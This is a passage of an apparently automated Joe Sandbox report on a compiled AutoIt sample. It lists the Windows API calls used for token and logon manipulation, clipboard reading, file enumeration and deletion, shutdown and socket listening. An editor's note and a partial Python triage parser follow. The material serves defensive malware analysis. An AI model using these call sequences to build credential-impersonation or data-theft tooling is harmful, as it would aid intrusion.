                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                      • String ID: Shell_TrayWnd
                                                                      • API String ID: 4125248594-2988720461
                                                                      • Opcode ID: 33fb5981e8e9c6ee20ab1be1fb300216914e29b34f64a3c1c845d7491ef6f1ea
                                                                      • Instruction ID: 1ca2853e8765c7c3d576de6e263bbbf33c239e56d331c7fe2371393aed35b0b5
                                                                      • Opcode Fuzzy Hash: 33fb5981e8e9c6ee20ab1be1fb300216914e29b34f64a3c1c845d7491ef6f1ea
                                                                      • Instruction Fuzzy Hash: FD311E71A50219BBEB216BB55C8AFBF7EACEB44B50F100065FA01F61D1C6B19910ABA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00C016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C0170D
                                                                        • Part of subcall function 00C016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C0173A
                                                                        • Part of subcall function 00C016C3: GetLastError.KERNEL32 ref: 00C0174A
                                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00C01286
                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00C012A8
                                                                      • CloseHandle.KERNEL32(?), ref: 00C012B9
                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C012D1
                                                                      • GetProcessWindowStation.USER32 ref: 00C012EA
                                                                      • SetProcessWindowStation.USER32 ref: 00C012F4
                                                                      • OpenDesktopW.USER32 ref: 00C01310
                                                                        • Part of subcall function 00C010BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C011FC), ref: 00C010D4
                                                                        • Part of subcall function 00C010BF: CloseHandle.KERNEL32(?), ref: 00C010E9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                      • String ID: $default$winsta0
                                                                      • API String ID: 22674027-1027155976
                                                                      • Opcode ID: 1d95713c6986434655b1986e357902059275f46e93ca31da498daef944a23b4d
                                                                      • Instruction ID: da30c6110964fbde314fec59c962c071aab0310094489e4c09208dde435f6f49
                                                                      • Opcode Fuzzy Hash: 1d95713c6986434655b1986e357902059275f46e93ca31da498daef944a23b4d
                                                                      • Instruction Fuzzy Hash: DF818971910209AFDF219FA5DC89FEEBBB9EF04704F184129FD20B61A0D7758A54CB21
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00C010F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C01114
                                                                        • Part of subcall function 00C010F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01120
                                                                        • Part of subcall function 00C010F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C0112F
                                                                        • Part of subcall function 00C010F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C00B9B,?,?,?), ref: 00C01136
                                                                        • Part of subcall function 00C010F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C0114D
                                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C00BCC
                                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C00C00
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C00C17
                                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00C00C51
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C00C6D
                                                                      • GetLengthSid.ADVAPI32(?), ref: 00C00C84
                                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C00C8C
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00C00C93
                                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C00CB4
                                                                      • CopySid.ADVAPI32(00000000), ref: 00C00CBB
                                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C00CEA
                                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C00D0C
                                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C00D1E
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00D45
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C00D4C
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00D55
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C00D5C
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C00D65
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C00D6C
                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00C00D78
                                                                      • HeapFree.KERNEL32(00000000), ref: 00C00D7F
                                                                        • Part of subcall function 00C01193: GetProcessHeap.KERNEL32(00000008,00C00BB1,?,00000000,?,00C00BB1,?), ref: 00C011A1
                                                                        • Part of subcall function 00C01193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C00BB1,?), ref: 00C011A8
                                                                        • Part of subcall function 00C01193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C00BB1,?), ref: 00C011B7
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                      • String ID:
                                                                      • API String ID: 4175595110-0
                                                                      • Opcode ID: c180272a12cb1cd2077a3d7c837e8e7827a58134aa0070507f4a2fbc3ebbb454
                                                                      • Instruction ID: d61d9da36caa3073739ab7af1eb5b95033a4706bd4f4773ca92157847cb0242d
                                                                      • Opcode Fuzzy Hash: c180272a12cb1cd2077a3d7c837e8e7827a58134aa0070507f4a2fbc3ebbb454
                                                                      • Instruction Fuzzy Hash: 3771497690020AABDF10DFA4DC84FAEBBB9BF04310F254519E925B6291D775AA05CBB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • OpenClipboard.USER32(00C3CC08), ref: 00C1EB29
                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00C1EB37
                                                                      • GetClipboardData.USER32 ref: 00C1EB43
                                                                      • CloseClipboard.USER32 ref: 00C1EB4F
                                                                      • GlobalLock.KERNEL32 ref: 00C1EB87
                                                                      • CloseClipboard.USER32 ref: 00C1EB91
                                                                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00C1EBBC
                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00C1EBC9
                                                                      • GetClipboardData.USER32 ref: 00C1EBD1
                                                                      • GlobalLock.KERNEL32 ref: 00C1EBE2
                                                                      • GlobalUnlock.KERNEL32(00000000,?), ref: 00C1EC22
                                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 00C1EC38
                                                                      • GetClipboardData.USER32 ref: 00C1EC44
                                                                      • GlobalLock.KERNEL32 ref: 00C1EC55
                                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00C1EC77
                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C1EC94
                                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C1ECD2
                                                                      • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00C1ECF3
                                                                      • CountClipboardFormats.USER32 ref: 00C1ED14
                                                                      • CloseClipboard.USER32 ref: 00C1ED59
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                      • String ID:
                                                                      • API String ID: 420908878-0
                                                                      • Opcode ID: 4938dbfad2bc83f8f08797337ccb264e9daa77da7e75d50145a39d9e59a62d1c
                                                                      • Instruction ID: d55eae1b019832b8122d72694fa83212786bd537139e8593c099aba2e33818d7
                                                                      • Opcode Fuzzy Hash: 4938dbfad2bc83f8f08797337ccb264e9daa77da7e75d50145a39d9e59a62d1c
                                                                      • Instruction Fuzzy Hash: 0F61C1352082019FD300EF24D889FAE77E4AF86714F08455DF856E72A1DB31DA85DB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C169BE
                                                                      • FindClose.KERNEL32(00000000), ref: 00C16A12
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C16A4E
                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C16A75
                                                                        • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C16AB2
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C16ADF
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                      • API String ID: 3830820486-3289030164
                                                                      • Opcode ID: 70793cb70c1016e29ba98b11ac890994ef8086a4aa631f90c03823c2a6e63f8a
                                                                      • Instruction ID: 6f94f553603abdc589d72ce8bb3b7d927a87dc74b15f8ec48a4fe8eb343acf1e
                                                                      • Opcode Fuzzy Hash: 70793cb70c1016e29ba98b11ac890994ef8086a4aa631f90c03823c2a6e63f8a
                                                                      • Instruction Fuzzy Hash: 67D15DB2508300AFC310EBA4CC91EAFB7ECAF89704F04495DF599D6191EB75DA48DB62
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 00C19663
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00C196A1
                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00C196BB
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00C196D3
                                                                      • FindClose.KERNEL32(00000000), ref: 00C196DE
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00C196FA
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C1974A
                                                                      • SetCurrentDirectoryW.KERNEL32(00C66B7C), ref: 00C19768
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C19772
                                                                      • FindClose.KERNEL32(00000000), ref: 00C1977F
                                                                      • FindClose.KERNEL32(00000000), ref: 00C1978F
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                      • String ID: *.*
                                                                      • API String ID: 1409584000-438819550
                                                                      • Opcode ID: b5c31a544032aa073276534e4961cdb93480b8865885290d1dbe4d3309eb060b
                                                                      • Instruction ID: 3a9a0b60acf1f460e8aaf9ce011ecd172f3d2155b78eb80ec440f34726d194ce
                                                                      • Opcode Fuzzy Hash: b5c31a544032aa073276534e4961cdb93480b8865885290d1dbe4d3309eb060b
                                                                      • Instruction Fuzzy Hash: 4E31D332500219ABDB24AFB4DC99FDE77ACDF4A320F104165F815E20E0DB31DE809B60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 00C197BE
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00C19819
                                                                      • FindClose.KERNEL32(00000000), ref: 00C19824
                                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00C19840
                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00C19890
                                                                      • SetCurrentDirectoryW.KERNEL32(00C66B7C), ref: 00C198AE
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C198B8
                                                                      • FindClose.KERNEL32(00000000), ref: 00C198C5
                                                                      • FindClose.KERNEL32(00000000), ref: 00C198D5
                                                                        • Part of subcall function 00C0DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C0DB00
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                      • String ID: *.*
                                                                      • API String ID: 2640511053-438819550
                                                                      • Opcode ID: facc63f291ef0c9fd9bdd9e9057bf69f64cc36623f9d1f88e86df9c8b9245f78
                                                                      • Instruction ID: f943555f709fbd82b222a49a15144ef98f9a11497e6672cf628cab04d38663fb
                                                                      • Opcode Fuzzy Hash: facc63f291ef0c9fd9bdd9e9057bf69f64cc36623f9d1f88e86df9c8b9245f78
                                                                      • Instruction Fuzzy Hash: 283185325406196EEB20EFB4EC98BDE77ACDF47320F144165E824A21E0DB31DAC5EB64
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00BA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA3A97,?,?,00BA2E7F,?,?,?,00000000), ref: 00BA3AC2
                                                                        • Part of subcall function 00C0E199: GetFileAttributesW.KERNEL32(?,00C0CF95), ref: 00C0E19A
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C0D122
                                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00C0D1DD
                                                                      • MoveFileW.KERNEL32 ref: 00C0D1F0
                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C0D20D
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C0D237
                                                                        • Part of subcall function 00C0D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008), ref: 00C0D2B2
                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 00C0D253
                                                                      • FindClose.KERNEL32(00000000), ref: 00C0D264
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 1946585618-1173974218
                                                                      • Opcode ID: 383f4e18f109462417a1e77f47fb0776788321bcdec21fe600be2c8fb0c4614a
                                                                      • Instruction ID: 0334b646f60fef2b8c44047477ce6e5d8109348afdacb6ffa31594f4d0c9262b
                                                                      • Opcode Fuzzy Hash: 383f4e18f109462417a1e77f47fb0776788321bcdec21fe600be2c8fb0c4614a
                                                                      • Instruction Fuzzy Hash: A5617D3180511DABCF05EBE0DA92AEEB7B5AF15340F2481A5E41277192EB31AF09DB60
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                      • String ID:
                                                                      • API String ID: 1737998785-0
                                                                      • Opcode ID: b32913fe9fb60109464b891747c1d412252066ae9188299943029c9162d2374d
                                                                      • Instruction ID: ffd54b4d2ac901481512ea035174049497cab296731831480a714cf788bd424d
                                                                      • Opcode Fuzzy Hash: b32913fe9fb60109464b891747c1d412252066ae9188299943029c9162d2374d
                                                                      • Instruction Fuzzy Hash: 8641AE35204611AFD310DF25E889F5ABBE1EF45318F14C099E829DB762C775ED81CB90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                        • Part of subcall function 00C016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C0170D
                                                                        • Part of subcall function 00C016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C0173A
                                                                        • Part of subcall function 00C016C3: GetLastError.KERNEL32 ref: 00C0174A
                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00C0E932
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                      • String ID: $ $@$SeShutdownPrivilege
                                                                      • API String ID: 2234035333-3163812486
                                                                      • Opcode ID: 94694ed70d4d74382c31dbd960358baf188249bbd182bbf4cf174ef73043c407
                                                                      • Instruction ID: c262a52c2d43bc4bc42ab4f7b63ba2e8442ba4500bd0f2b96c9f6b6112d6dd7f
                                                                      • Opcode Fuzzy Hash: 94694ed70d4d74382c31dbd960358baf188249bbd182bbf4cf174ef73043c407
                                                                      • Instruction Fuzzy Hash: 1601D673660211ABEB6426B59CC6BFF725CA714750F194D21FD13F21D1D5A15D40D290
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C21276
                                                                      • WSAGetLastError.WSOCK32 ref: 00C21283
                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00C212BA
                                                                      • WSAGetLastError.WSOCK32 ref: 00C212C5
                                                                      • closesocket.WSOCK32(00000000), ref: 00C212F4
                                                                      • listen.WSOCK32(00000000,00000005), ref: 00C21303
                                                                      • WSAGetLastError.WSOCK32 ref: 00C2130D
                                                                      • closesocket.WSOCK32(00000000), ref: 00C2133C
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.457876260.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                      • Associated: 00000003.00000002.457872449.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457891140.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457901097.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.457904821.0000000000C84000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_ba0000_OIU.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                                      • String ID:
                                                                      • API String ID: 540024437-0
                                                                      • Opcode ID: 0ae74402c91ea0143bf677bd6d31e7abade6c275a774df1acf7b637af014fc28
                                                                      • Instruction ID: 536b84b721ad27afb6754a906927f4b7fba6d45d070044ef0fb0e434ac1d3677
                                                                      • Opcode Fuzzy Hash: 0ae74402c91ea0143bf677bd6d31e7abade6c275a774df1acf7b637af014fc28
                                                                      • Instruction Fuzzy Hash: 71418031A00110DFD710DF24D494B2ABBE6AF56318F188198E8669F6E3C771EE81CBE1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%
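The blocks above are the Joe Sandbox IDA plugin's per-function API listings for the module based at 00BA0000. Read them as capabilities present in the code rather than as observed behaviour: the report's "Binary is likely a compiled AutoIt script file" signature indicates this image carries the AutoIt interpreter, and the interpreter's runtime (a listening socket via socket/bind/listen, shutdown via SeShutdownPrivilege and ExitWindowsEx, the recursive FindFirstFileW/FindNextFileW directory walks) is linked in whether or not the embedded script ever calls it. Whether a capability was exercised is answered by the behaviour sections of the report (network, file system and process activity), not by this listing. The Python below is an added example written for this page, not part of the report or of Joe Security's tooling: it parses function blocks in this format and maps each function's API set to a coarse capability tag. The excerpt in SAMPLE is copied from the blocks above; the tag rules and the "enables-SeShutdownPrivilege" refinement are the editor's own assumptions.

```python
"""Triage helper for the per-function API listings shown in this report.
Added example by the editor, not code from Joe Security or from the sample;
the capability rules below are the editor's own assumptions."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed excerpt: three function blocks copied from the listing above.
SAMPLE = """\
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C21276
• WSAGetLastError.WSOCK32 ref: 00C21283
• bind.WSOCK32(00000000,?,00000010), ref: 00C212BA
• listen.WSOCK32(00000000,00000005), ref: 00C21303
• closesocket.WSOCK32(00000000), ref: 00C2133C
Similarity
• String ID:
APIs
  • Part of subcall function 00C016C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C0170D
  • Part of subcall function 00C016C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C0173A
• ExitWindowsEx.USER32(?,00000000), ref: 00C0E932
Similarity
• String ID: $ $@$SeShutdownPrivilege
APIs
• FindFirstFileW.KERNEL32(?,?,75701228,?,00000000), ref: 00C19663
• GetFileAttributesW.KERNEL32(?), ref: 00C196A1
• SetFileAttributesW.KERNEL32(?,?), ref: 00C196BB
• FindNextFileW.KERNEL32(00000000,?), ref: 00C196D3
• FindFirstFileW.KERNEL32(*.*,?), ref: 00C196FA
• FindClose.KERNEL32(00000000), ref: 00C1978F
Similarity
• String ID: *.*
"""


@dataclass
class ApiCall:
    name: str
    module: str
    args: list                        # argument strings as printed ('?' = unresolved)
    ref: str                          # address of the call site
    subcall_of: Optional[str] = None  # set when the call lives in a called function


@dataclass
class FuncBlock:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)


# '• Name.MODULE(args), ref: ADDR'; args are optional, and a
# 'Part of subcall function ADDR:' prefix marks calls made by callees.
API_RE = re.compile(
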